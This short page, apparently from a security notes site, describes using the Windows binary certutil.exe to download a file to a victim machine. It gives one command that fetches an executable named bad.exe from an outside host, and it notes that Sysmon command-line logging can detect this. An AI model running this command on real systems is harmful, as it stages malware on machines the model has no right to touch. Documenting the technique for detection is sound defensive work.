Powered By GitBook
Downloading Files with Certutil
Downloading additional files to the victim system using native OS binary.

Execution

1
certutil.exe -urlcache -f http://10.0.0.5/40564.exe bad.exe
Copied!

Observations

Sysmon commandling logging is a good place to start for monitoring suspicious certutil.exe behaviour:
Last modified 3yr ago
Copy link